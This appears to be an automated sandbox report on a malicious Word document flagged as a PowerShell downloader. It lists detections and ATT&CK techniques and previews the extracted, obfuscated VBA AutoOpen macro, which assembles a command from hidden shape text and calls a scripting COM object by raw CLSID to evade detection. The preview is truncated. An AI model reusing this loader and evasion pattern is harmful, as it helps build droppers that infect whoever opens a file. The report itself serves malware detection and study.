Verdict: MALICIOUS
Risk Score: 242
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1218.011 Signed Binary Proxy Execution: Rundll32
- T1059.003 Windows Command Shell
The sample contains VBA macros with an AutoOpen function, a common technique for initial execution. Critical heuristics indicate the use of the dangerous WScript.Shell COM object, which is often used to download and execute further payloads. The ClamAV detection name 'Doc.Malware.Powload-6813874-0' further supports a malicious classification, likely involving a PowerShell-based downloader.
Heuristics (7)

- ClamAV: Doc.Malware.Powload-6813874-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7353 bytes |

SHA-256: a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vkrIvo
Case 261796299
JMPfnbvWX = CBool(PIMdwq)
XozAFqzj = 202977267
Case 254520823
BwZTiSn = Atn(aJpVSAf)
oDwSlB = Atn(150279987 * CLng(161171088))
End Select
For Each opEWS In IoUUarvat
WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
On Error Resume Next
Select Case wbSfAuHqB
Case 228511584
MWQBzzj = CBool(iplArb)
EBzJRFzYj = 140090619
Case 317061610
CORXFoUc = Atn(HjQGqziK)
bbEJpG = Atn(281881762 * CLng(290387237))
End Select
For Each QMzhjD In iwQRfL
wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
On Error Resume Next
Select Case BXfUnH
Case 57851
RzRMWR = CBool(ZJPFj)
tTPSvJ = 198933616
Case 105961790
VBHWTPR = Atn(KzNSa)
UJVBwsLR = Atn(85127322 * CLng(240300735))
End Select
For Each IDPCrwVCw In PFAzrHz
HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
On Error Resume Next
Select Case kCjBkNGiv
Case 179842107
KQzTP = CBool(WINstzHPE)
UXMzjLK = 106854421
Case 50139025
voBBioWD = Atn(HcQiaTF)
BrFcm = Atn(208979615 * CLng(235211728))
End Select
For Each LjbWwGhM In whGLJFaD
zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
On Error Resume Next
Select Case Mzupinujk
Case 58059155
XJHHcGwhs = CBool(YWNnXzi)
vvSVp = 327101863
Case 331789580
PXXUt = Atn(EqNtLoc)
KjBXnajCG = Atn(262793553 * CLng(106085712))
End Select
For Each pMcBUJI In qZJYbBS
Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
On Error Resume Next
Select Case FoowV
Case 157925559
JAARS = CBool(tiZtQn)
jWkiKG = 12526672
Case 298256573
IjwQi = Atn(LwbTr)
GKiCRJp = Atn(196775958 * CLng(107896437))
End Select
For Each UEFXiEFlO In HErQVBi
WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
On Error Resume Next
Select Case OUPWOQjo
Case 251591343
pYXKlFHSK = CBool(XKjqbzhz)
WFAWp = 175999019
Case 164045125
UcOzV = Atn(ssMtU)
UDRWUJE = Atn(266638292 * CLng(161282208))
End Select
For Each OihmPkoCh In MznpvlBH
zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
On Error Resume Next
Select Case NsCjvOaRo
Case 131495540
lwcodjh = CBool(zkbFMAAB)
jikwnwVN = 201509120
Case 288855890
djCjkaCjr = Atn(PwZwF)
lmqivN = Atn(284979970 * CLng(226420251))
End Select
For Each jfzAG In zroLShr
lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B8
... (truncated)